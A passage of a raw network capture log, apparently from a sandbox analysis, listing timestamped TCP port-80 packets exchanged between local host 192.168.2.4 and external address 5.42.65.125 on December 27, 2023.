Dec 27, 2023 17:57:25.767579079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.767585993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.767617941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.767661095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.767674923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.767688036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.767721891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.768511057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.768524885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.768567085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.768666029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.768677950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.768690109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.768701077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.768712997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.768739939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.768739939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.769417048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.769515991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.769529104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.769540071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.769551992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.769582033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.769603014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.769615889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.769622087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.769656897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.770478010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.770492077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.770503044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.770517111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.770529032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.770530939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.770541906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.770555973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.770561934 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.770593882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.771444082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.771456003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.771475077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.771487951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.771498919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.771501064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.771512032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.771523952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.771533012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.771541119 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.771579981 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.772233009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.772380114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.772432089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.772447109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.772478104 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.772491932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.772505045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.772505045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.772517920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.772530079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.772543907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.772571087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.773406029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.773417950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.773430109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.773442030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.773454905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.773458958 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.773468971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.773482084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.773494005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.773515940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.774358988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.774374008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.774386883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.774399996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.774410009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.774414062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.774429083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.774440050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.774441957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.774471045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.774483919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.775208950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.775420904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.775434017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.775445938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.775458097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.775466919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.775480032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.775504112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.775506020 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.775517941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.776148081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.776161909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.776195049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.776196003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.776233912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.776257992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.776271105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.776283979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.776295900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.776323080 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.776348114 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.776798964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.777095079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.777134895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.777148962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.777174950 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.777199984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.777214050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.777245045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.777265072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.777278900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.777311087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.777998924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.778049946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.778052092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.778063059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.778075933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.778088093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.778099060 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.778100967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.778130054 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.778151989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.778191090 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.778908014 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.778934002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.779062986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.779077053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.779122114 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.779160023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.779175043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.779186964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.779201031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.779205084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.779215097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.779232979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.779263973 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.780047894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.780062914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.780076027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.780122042 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.780132055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.780147076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.780159950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.780173063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.780194998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.780951023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.780965090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.780977964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.780985117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.780992985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.781004906 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.781004906 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.781024933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.781033993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.781052113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.781076908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.781092882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.781109095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.781805038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.781819105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.781835079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.781848907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.781862974 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.781892061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.781950951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.781966925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.781979084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.782022953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.782768965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.782865047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.782877922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.782891989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.782905102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.782917976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.782938004 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.782944918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.782953024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.782974005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.783756971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.783772945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.783786058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.783801079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.783807993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.783813953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.783823967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.783828974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.783863068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.784564018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.784599066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.784614086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.784662008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.784678936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.784686089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.784693956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.784706116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.784724951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.784735918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.784769058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.785455942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.785624027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.785638094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.785651922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.785685062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.785716057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.785723925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.785742044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.785754919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.785768032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.785793066 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.785813093 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.786535978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.786550999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.786570072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.786582947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.786601067 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.786623955 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.786623955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.786638975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.786653042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.786690950 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.787430048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.787444115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.787458897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.787472963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.787487030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.787497997 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.787509918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.787522078 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.787524939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.787542105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.788338900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.788352013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.788363934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.788378000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.788387060 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.788391113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.788403988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.788417101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.788425922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.788444996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.789158106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.789172888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.789210081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.789253950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.789288044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.789299965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.789303064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.789318085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.789330006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.789361954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.789397001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.790105104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.790132046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.790144920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.790193081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.790203094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.790215969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.790229082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.790241957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.790246964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.790283918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.790965080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.791068077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.791080952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.791093111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.791105986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.791116953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.791120052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.791134119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.791135073 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.791157007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.791179895 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.791970968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.792318106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.792331934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.792383909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.792408943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.792423964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.792437077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.792448997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.792463064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.792511940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.792939901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.792954922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.792968035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.792980909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.792994022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.793015003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.793025017 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.793030977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.793056965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.793775082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.793790102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.793842077 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.793868065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.793891907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.793904066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.793915987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.793916941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.793930054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.793947935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.793997049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.794866085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.794948101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.794964075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.794975996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.794989109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.795002937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.795011044 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.795018911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.795030117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.795049906 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.795608044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.795623064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.795634985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.795648098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.795654058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.795671940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.795701981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.795716047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.795727968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.795741081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.795769930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.796385050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.796399117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.796412945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.796427965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.796449900 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.796463013 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.796487093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.796499968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.796511889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.796542883 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.797063112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.797694921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.797734976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.797749043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.797760963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.797799110 CET	80	49738	5.42.65.125	192.168.2.4
